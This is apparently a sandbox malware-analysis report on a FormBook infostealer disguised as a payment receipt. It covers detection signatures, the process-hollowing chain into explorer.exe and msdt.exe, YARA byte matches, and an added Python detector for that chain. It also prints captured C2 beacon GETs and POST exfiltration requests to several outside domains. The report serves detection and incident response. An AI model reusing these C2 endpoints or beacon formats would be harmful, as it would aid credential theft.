Windows Analysis Report
payment_copy2_receipt.exe

Overview

General Information

Sample Name: payment_copy2_receipt.exe
Analysis ID: 756109
MD5: 9b8c61ded729ca6c9d5f7fded18eef27
SHA1: 37fc137e9aa09fc01820cd90c851ca3aee6be72a
SHA256: c1609447bd7a2ee528d1f2145ebc3ad9a53efee61111824d22f935e497bac31f
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Process Tree

  • System is w10x64
  • payment_copy2_receipt.exe (PID: 6116 cmdline: C:\Users\user\Desktop\payment_copy2_receipt.exe MD5: 9B8C61DED729CA6C9D5F7FDED18EEF27)
    • fcvvthv.exe (PID: 6108 cmdline: "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q MD5: 353F7D8845E3DD77D50661A00EC7DF55)
      • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • fcvvthv.exe (PID: 2828 cmdline: "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q MD5: 353F7D8845E3DD77D50661A00EC7DF55)
        • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • msdt.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • cleanup
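
The tree above is the whole infection path: an NSIS-packaged dropper on the Desktop writes fcvvthv.exe to %TEMP%, that stager starts a second copy of itself and hollows it (the Signatures list flags suspended-mode process creation, thread-context modification and APC queuing), the payload moves into explorer.exe, and explorer.exe then launches a 32-bit msdt.exe from SysWOW64 as the final host for the stealer and the network beacons. The Python below is an added example, not part of the Joe Sandbox report: it shows how the two observable ends of that chain can be correlated from ordinary process-creation telemetry. The record layout, the sample events and the 120-second window are constructed for the example and are not fields or thresholds the report defines.

```python
"""Correlate process-creation telemetry into the injection chain shown above.

Added example, not part of the Joe Sandbox report. The events are constructed
to mirror the report's tree: a Temp-resident dropper (fcvvthv.exe) that launches
a second copy of itself, and explorer.exe that later launches a 32-bit msdt.exe
with an empty argument list. The record layout (ts, pid, ppid, image, cmdline,
parent_image) and the 120-second correlation window are assumptions of this
example.
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: float           # seconds since the first event
    pid: int
    ppid: int
    image: str          # full path of the created process
    cmdline: str
    parent_image: str   # full path of the creating process


TEMP_MARKER = "\\appdata\\local\\temp\\"
SYSWOW64 = "c:\\windows\\syswow64\\"


def is_temp_self_respawn(ev: ProcEvent) -> bool:
    """A Temp-resident executable starting a second copy of itself.

    This is the stager step before hollowing: the first fcvvthv.exe creates the
    second one suspended and overwrites it with the unpacked payload. Image
    paths are compared case-insensitively rather than command lines, because
    the report shows the cmdline using the 8.3 short name (user~1).
    """
    image = ev.image.lower()
    return image == ev.parent_image.lower() and TEMP_MARKER in image


def is_bare_syswow64_child_of_explorer(ev: ProcEvent) -> bool:
    """explorer.exe launching a 32-bit system binary with no arguments.

    After injection explorer.exe is the real parent, and the payload picks a
    SysWOW64 host to match its own 32-bit image. A command line equal to the
    bare image path is the distinguishing detail; the assumption here is that
    user-driven launches of such tools carry parameters.
    """
    image = ev.image.lower()
    bare = ev.cmdline.strip().strip('"').lower()
    return (ntpath.basename(ev.parent_image).lower() == "explorer.exe"
            and image.startswith(SYSWOW64) and bare == image)


def injection_chains(events: list, window: float = 120.0) -> list:
    """Pair each Temp self-respawn with a later bare SysWOW64 launch from explorer.

    The two ends are linked by time, not by PID ancestry: in real telemetry
    explorer.exe's parent is winlogon/userinit, so the dropper never appears
    as an ancestor of the final host even though it injected into it.
    """
    stagers = [e for e in events if is_temp_self_respawn(e)]
    hosts = [e for e in events if is_bare_syswow64_child_of_explorer(e)]
    return [
        {"stager_pid": s.pid, "stager": s.image, "host_pid": h.pid, "host": h.image,
         "delay_s": round(h.ts - s.ts, 1)}
        for s in stagers for h in hosts if 0.0 <= h.ts - s.ts <= window
    ]


TMP = r"C:\Users\user\AppData\Local\Temp"
EXPLORER = r"C:\Windows\Explorer.EXE"
STAGER_CMD = r'"C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q'
# Constructed events modelled on the report's process tree; timestamps are illustrative.
SAMPLE_EVENTS = [
    ProcEvent(0.0, 6116, 3320, r"C:\Users\user\Desktop\payment_copy2_receipt.exe",
              r"C:\Users\user\Desktop\payment_copy2_receipt.exe", EXPLORER),
    ProcEvent(1.5, 6108, 6116, TMP + r"\fcvvthv.exe", STAGER_CMD,
              r"C:\Users\user\Desktop\payment_copy2_receipt.exe"),
    ProcEvent(1.6, 5180, 6108, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1", TMP + r"\fcvvthv.exe"),
    ProcEvent(2.0, 2828, 6108, TMP + r"\fcvvthv.exe", STAGER_CMD, TMP + r"\fcvvthv.exe"),
    ProcEvent(9.0, 5440, 3320, r"C:\Windows\SysWOW64\msdt.exe", r"C:\Windows\SysWOW64\msdt.exe", EXPLORER),
    # A 64-bit tool from explorer with a bare command line: ordinary user activity, must not match.
    ProcEvent(30.0, 7000, 3320, r"C:\Windows\System32\notepad.exe", r"C:\Windows\System32\notepad.exe", EXPLORER),
]

if __name__ == "__main__":
    for chain in injection_chains(SAMPLE_EVENTS):
        print(chain)
```

Run stand-alone it prints one chain, stager PID 2828 to host PID 5440 seven seconds later. The notepad.exe event is there to show why the SysWOW64 criterion matters: explorer.exe launching 64-bit System32 tools with a bare command line is everyday activity and must not fire.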

Malware Configuration

FormBook {"C2 list": ["www.projectlis.online/veh0/"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x100d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x8e07:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x86b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x8d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x8e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x78fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xee47:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xfe3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0xb119:$sqlite3step: 68 34 1C 7B E1
  • 0xbc91:$sqlite3step: 68 34 1C 7B E1
  • 0xb15b:$sqlite3text: 68 38 2A 90 C5
  • 0xbcd6:$sqlite3text: 68 38 2A 90 C5
  • 0xb172:$sqlite3blob: 68 53 D8 7F 8C
  • 0xbcec:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(29 further memory-dump matches are not expanded in this copy of the report)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.fcvvthv.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.fcvvthv.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6f48:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1fa07:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xb206:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1873e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.fcvvthv.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x1853c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x17fe8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x1863e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x187b6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xadd1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x17233:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1e77e:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1f771:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.fcvvthv.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x1aa50:$sqlite3step: 68 34 1C 7B E1
  • 0x1b5c8:$sqlite3step: 68 34 1C 7B E1
  • 0x1aa92:$sqlite3text: 68 38 2A 90 C5
  • 0x1b60d:$sqlite3text: 68 38 2A 90 C5
  • 0x1aaa9:$sqlite3blob: 68 53 D8 7F 8C
  • 0x1b623:$sqlite3blob: 68 53 D8 7F 8C
3.2.fcvvthv.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(3 further unpacked-PE matches are not expanded in this copy of the report)

The three JPCERT strings are each a five-byte push imm32 (opcode 68) of a constant the rule names after the sqlite3 step, text and blob routines; each constant occurs twice in the unpacked image, which fits the browser-database credential harvesting flagged under Signatures. The matches against the same rules in the explorer.exe (process 4) and msdt.exe (process 0C) dumps show the payload present in both injection targets, not just in fcvvthv.exe.

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: payment_copy2_receipt.exe | ReversingLabs: Detection: 53%
Source: payment_copy2_receipt.exe | Virustotal: Detection: 38%
Source: Yara match | File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.bem4u.shop/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v | Avira URL Cloud: Label: malware
Source: http://www.030332.com/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT | Avira URL Cloud: Label: malware
Source: http://www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs | Avira URL Cloud: Label: malware
Source: https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV | Avira URL Cloud: Label: malware
Source: http://www.stephapproved.com/veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs | Avira URL Cloud: Label: malware
Source: http://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM | Avira URL Cloud: Label: malware
Source: http://www.bem4u.shop/veh0/ | Avira URL Cloud: Label: malware
Source: http://www.vnsuda.lol/veh0/ | Avira URL Cloud: Label: malware
Source: http://www.coolfashionshop.xyz/veh0/ | Avira URL Cloud: Label: malware
Source: www.projectlis.online/veh0/ | Avira URL Cloud: Label: malware
Source: http://www.stephapproved.com/veh0/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.projectlis.online/veh0/"]}
Source: payment_copy2_receipt.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: msdt.pdbGCTL | source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: fcvvthv.exe, 00000001.00000003.253544929.0000000002620000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000001.00000003.245524728.0000000002780000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: fcvvthv.exe, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: msdt.pdb | source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_00405FF6 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe | Code function: 0_2_00402654 FindFirstFileA,
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe | Code function: 1_2_00410290 FindFirstFileExW,

Networking

Source: C:\Windows\explorer.exe | Domain query: www.bem4u.shop
Source: C:\Windows\explorer.exe | Domain query: www.030332.com
Source: C:\Windows\explorer.exe | Domain query: www.vnsuda.lol
Source: C:\Windows\explorer.exe | Domain query: www.stephapproved.com
Source: C:\Windows\explorer.exe | Network Connect: 75.2.115.196 80
Source: C:\Windows\explorer.exe | Network Connect: 70.32.23.81 80
Source: C:\Windows\explorer.exe | Network Connect: 34.110.163.134 80
Source: C:\Windows\explorer.exe | Domain query: www.coolfashionshop.xyz
Source: C:\Windows\explorer.exe | Network Connect: 103.100.208.243 80
Source: C:\Windows\explorer.exe | Network Connect: 2.57.90.16 80
Source: C:\Windows\explorer.exe | DNS query: www.coolfashionshop.xyz
Source: Malware configuration extractor | URLs: www.projectlis.online/veh0/
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: A2HOSTINGUS
Source: global traffic | HTTP traffic detected:
    GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT HTTP/1.1
    Host: www.030332.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven null bytes, nothing printable)
Source: global traffic | HTTP traffic detected:
    GET /veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs HTTP/1.1
    Host: www.vnsuda.lol
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven null bytes, nothing printable)
Source: global traffic | HTTP traffic detected:
    GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM HTTP/1.1
    Host: www.coolfashionshop.xyz
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven null bytes, nothing printable)
Source: global traffic | HTTP traffic detected:
    GET /veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs HTTP/1.1
    Host: www.stephapproved.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven null bytes, nothing printable)
Source: global traffic | HTTP traffic detected:
    GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v HTTP/1.1
    Host: www.bem4u.shop
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (seven null bytes, nothing printable)
Source: Joe Sandbox View | IP Address: 75.2.115.196
Source: global traffic | HTTP traffic detected:
    POST /veh0/ HTTP/1.1
    Host: www.vnsuda.lol
    Connection: close
    Content-Length: 191
    Cache-Control: no-cache
    Origin: http://www.vnsuda.lol
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.vnsuda.lol/veh0/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 56 38 4f 6c 71 3d 4b 32 42 42 6a 5a 7a 71 4b 58 57 37 35 67 6e 36 64 57 51 6c 39 6a 32 4e 47 6b 69 45 36 63 5a 30 37 62 67 68 75 70 7e 58 75 58 6d 74 4f 46 75 5f 68 4b 63 32 75 74 38 49 53 62 49 52 53 57 33 32 4e 4f 77 45 79 31 63 4e 62 44 31 39 49 43 30 52 58 72 68 49 51 47 6e 74 6d 62 56 4d 55 2d 61 77 28 78 78 39 76 44 4e 31 55 6b 33 77 4c 67 55 61 31 75 4f 38 49 63 7e 5a 36 74 6e 46 28 6f 4f 71 42 4e 78 6c 69 61 51 72 37 72 7a 66 78 49 52 66 46 5a 4a 77 64 4b 37 67 70 52 6b 74 4b 4b 61 71 56 2d 70 7a 6f 32 74 4d 45 77 7a 64 28 37 34 41 48 76 50 48 79 6f 45 2e 00 00 00 00 00 00 00 00
    Data Ascii: V8Olq=K2BBjZzqKXW75gn6dWQl9j2NGkiE6cZ07bghup~XuXmtOFu_hKc2ut8ISbIRSW32NOwEy1cNbD19IC0RXrhIQGntmbVMU-aw(xx9vDN1Uk3wLgUa1uO8Ic~Z6tnF(oOqBNxliaQr7rzfxIRfFZJwdK7gpRktKKaqV-pzo2tMEwzd(74AHvPHyoE.
Source: global traffic | HTTP traffic detected:
    POST /veh0/ HTTP/1.1
    Host: www.coolfashionshop.xyz
    Connection: close
    Content-Length: 191
    Cache-Control: no-cache
    Origin: http://www.coolfashionshop.xyz
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.coolfashionshop.xyz/veh0/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 56 38 4f 6c 71 3d 77 31 6a 53 66 6c 50 65 73 73 61 7a 5a 66 69 68 42 6d 51 35 54 76 5a 57 33 71 4c 52 53 35 68 59 57 59 59 4f 4c 52 63 73 51 79 37 5f 6c 34 6b 79 5a 63 4f 6e 28 32 62 43 6f 4b 77 61 59 67 53 57 55 67 79 58 28 79 76 69 43 67 45 48 6f 36 47 43 47 58 5a 44 61 72 34 47 56 6f 59 72 66 49 47 58 4a 59 68 67 54 57 37 4d 68 7a 34 45 63 4f 55 69 68 6c 4d 57 65 79 71 32 76 38 30 53 45 61 57 56 4d 36 48 5f 32 65 79 48 44 63 54 37 6c 58 62 4c 51 62 47 63 56 4a 73 62 48 62 55 5f 6d 4a 7a 63 46 53 61 6e 71 4b 78 48 48 4f 4f 36 62 37 53 52 6a 72 6e 55 42 58 41 2e 00 00 00 00 00 00 00 00
    Data Ascii: V8Olq=w1jSflPessazZfihBmQ5TvZW3qLRS5hYWYYOLRcsQy7_l4kyZcOn(2bCoKwaYgSWUgyX(yviCgEHo6GCGXZDar4GVoYrfIGXJYhgTW7Mhz4EcOUihlMWeyq2v80SEaWVM6H_2eyHDcT7lXbLQbGcVJsbHbU_mJzcFSanqKxHHOO6b7SRjrnUBXA.
Source: global traffic | HTTP traffic detected:
    POST /veh0/ HTTP/1.1
    Host: www.stephapproved.com
    Connection: close
    Content-Length: 191
    Cache-Control: no-cache
    Origin: http://www.stephapproved.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.stephapproved.com/veh0/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 56 38 4f 6c 71 3d 6e 30 71 45 73 54 75 6c 54 70 55 72 39 6e 32 7a 50 65 55 67 75 34 77 6a 64 76 46 61 4e 57 6a 6f 43 35 39 65 48 58 64 6f 34 78 47 61 67 36 4e 54 71 32 55 6a 63 70 33 4d 4c 64 4b 46 5a 69 6d 54 77 34 34 37 36 31 62 32 56 70 6c 30 49 77 73 51 66 64 54 56 42 6d 4f 7a 6b 4a 79 36 71 56 47 51 6a 6a 55 41 32 61 6a 35 67 37 39 47 70 35 6d 33 62 44 43 51 79 76 38 33 50 46 7a 54 45 64 79 46 77 48 61 71 37 4b 33 36 64 6c 4f 4f 52 32 79 6c 4d 4f 4e 51 76 30 36 6e 66 32 7e 69 35 77 28 75 7a 5a 37 72 76 65 7e 5a 31 62 63 4d 52 35 61 66 49 34 62 53 30 35 4d 2e 00 00 00 00 00 00 00 00
    Data Ascii: V8Olq=n0qEsTulTpUr9n2zPeUgu4wjdvFaNWjoC59eHXdo4xGag6NTq2Ujcp3MLdKFZimTw44761b2Vpl0IwsQfdTVBmOzkJy6qVGQjjUA2aj5g79Gp5m3bDCQyv83PFzTEdyFwHaq7K36dlOOR2ylMONQv06nf2~i5w(uzZ7rve~Z1bcMR5afI4bS05M.
Source: global traffic | HTTP traffic detected:
    POST /veh0/ HTTP/1.1
    Host: www.bem4u.shop
    Connection: close
    Content-Length: 191
    Cache-Control: no-cache
    Origin: http://www.bem4u.shop
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.bem4u.shop/veh0/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 56 38 4f 6c 71 3d 31 42 57 76 56 6a 72 61 46 2d 73 54 64 48 28 39 47 73 38 53 58 7a 35 54 62 53 39 65 4e 45 79 4b 4e 46 48 6b 47 62 55 6b 52 59 50 49 6a 4f 33 72 37 33 74 73 66 42 65 62 6c 5f 75 66 67 32 44 5a 4f 38 50 69 69 6a 6b 36 44 36 68 73 4f 46 4d 63 6e 2d 4a 70 32 77 62 36 61 4b 48 58 49 71 37 37 55 6d 5a 41 78 37 6b 5a 28 65 44 52 75 2d 66 2d 4b 35 4a 53 44 30 49 56 47 66 30 38 67 4e 67 33 69 31 56 4c 45 50 42 61 6c 4d 48 63 30 66 74 6a 4c 33 49 79 69 38 77 41 6a 56 42 4f 52 6c 76 65 46 78 59 41 57 52 65 75 58 79 36 62 6d 64 56 4f 65 44 44 77 4a 79 77 2e 00 00 00 00 00 00 00 00
    Data Ascii: V8Olq=1BWvVjraF-sTdH(9Gs8SXz5TbS9eNEyKNFHkGbUkRYPIjO3r73tsfBebl_ufg2DZO8Piijk6D6hsOFMcn-Jp2wb6aKHXIq77UmZAx7kZ(eDRu-f-K5JSD0IVGf08gNg3i1VLEPBalMHc0ftjL3Iyi8wAjVBORlveFxYAWReuXy6bmdVOeDDwJyw.
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 29 Nov 2022 15:42:38 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
